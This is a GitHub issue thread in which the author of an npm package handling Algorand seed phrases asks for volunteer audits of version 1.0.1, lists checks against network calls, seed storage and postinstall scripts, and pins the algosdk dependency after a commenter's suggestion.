Calling soft auditors to vet v1.0.1 on npm
Opened this issue · 3 comments
Hi,
If you are well versed enough in Javascript to go through the code on NPM and confirm that it doesn't include anything nasty that could exfil a user's seed phrase, that would help a lot.
The package is intended to be fixed @ 1.0.0 1.0.1* version, so if you want to audit the code on npm which is immutable and drop a comment in this issue about it doing what it says on the tin/README, that would be appreciated by myself and skeptical potential users.
* 1.0.1 published after feedback below
Things to check:
.js files:
- do not do network calls
- do not save the seed phrase anywhere
package.json:
- only imports the algosdk package
- does not run any custom stuff like postinstall scripts
For more immutability I would pin the algosdk
version to 1.18.1
(remove the ^
). That will avoid installing future malicious versions, however unlikely but possible.
Fair enough - I didn't intend to change this but why not. 1.0.1
published with fixed algosdk.
If you think the code is benign please leave a comment to this effect.
Thanks!